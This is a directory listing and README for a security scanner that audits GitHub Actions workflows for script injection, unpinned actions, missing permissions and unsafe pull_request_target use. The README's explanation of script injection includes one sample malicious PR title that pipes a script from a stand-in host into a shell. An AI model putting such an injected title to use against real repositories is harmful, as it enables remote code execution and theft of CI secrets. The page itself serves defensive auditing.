
GitHub Actions Security Audit
io.github.tylerscomic-labv1.0.0Updated Oct 2, 2026
Audit GitHub Actions workflows for script injection, unpinned actions and missing permissions.
Overview
Audits GitHub Actions workflow YAML for script injection, unpinned actions, missing permissions, and unsafe pull_request_target use.
- What it does
- This server scans GitHub Actions workflow YAML for security problems rather than style issues. It parses the YAML structure and reports script injection from attacker-controlled expressions in run steps, third-party actions pinned only to tags or branches, missing permissions blocks, and pull_request_target combined with checking out the PR head. The audit_workflow tool returns a risk level with each finding's location, explanation, and a concrete fix; check_expression_injection checks a single shell command string.
- When to use it
- Use it when reviewing or hardening CI/CD workflows, especially before merging changes to workflow files or when auditing repositories that run untrusted pull requests. It suits maintainers who want a focused security check rather than a general YAML linter.
- Requirements
- The hosted option is a remote streamable HTTP endpoint, so no local runtime is needed. Self-hosting requires Node.js and running the server locally after installing dependencies. The hosted tier is described as free with a paid Pro option.
Installation
In SourceWeft
- Open GitHub Actions Security Audit in the dashboard and add it to a workspace.
- Enable the server for the chats that should use its tools.
Web executable via Streamable HTTP. Remote servers run from the web runtime once configured in a workspace.
Other MCP clients
Add this to your client's mcpServers config.
{
"mcpServers": {
"github-actions-audit-mcp": {
"type": "http",
"url": "https://github-actions-audit-mcp.mcpize.run/mcp"
}
}
}README
github-actions-audit-mcp
[License: MIT] [Live on MCPize]
An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to what workflow files actually use), not string/regex matching against the raw file.
What it catches
Script injection. Any ${{ github.event.issue.title }}-style expression that carries attacker-controlled text
(issue/PR titles, comments, review bodies, branch names) interpolated directly into a run: shell step. The
expression is substituted into the generated shell script before the shell runs it — a PR titled "; curl evil.sh | sh # becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions
vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.
Unpinned third-party actions. uses: some-action@v4 or @main can be repointed by whoever controls that
tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the
tj-actions/changed-files compromise (March 2025), where a maintainer's
PAT was used to retag v35–v46 to point at a credential-harvesting commit. Only a full 40-character commit SHA is
immutable.
Missing permissions: blocks. No explicit permissions: means the GITHUB_TOKEN defaults to whatever your
repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.
pull_request_target + head checkout. This trigger runs with the base repo's secrets and a write-scoped token
(unlike plain pull_request), and if the workflow also checks out the PR's own head commit, a fork's PR can run
arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.
Tools
audit_workflow
Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's dangerous, and a concrete fix.
check_expression_injection
Focused check on a single shell command string, for when you just want to sanity-check one run: step without a
full workflow file.
Use it
Hosted (recommended): MCPize — free tier, $7/mo Pro.
Self-host:
Part of a small suite
regex-safety-audit-mcp, mcp-trust-audit-mcp, secrets-leak-audit-mcp, dockerfile-audit-mcp.
License
MIT
Source: README.md at commit 9c5baae
Tools
0Version history
1- v1.0.0LatestOct 2, 2026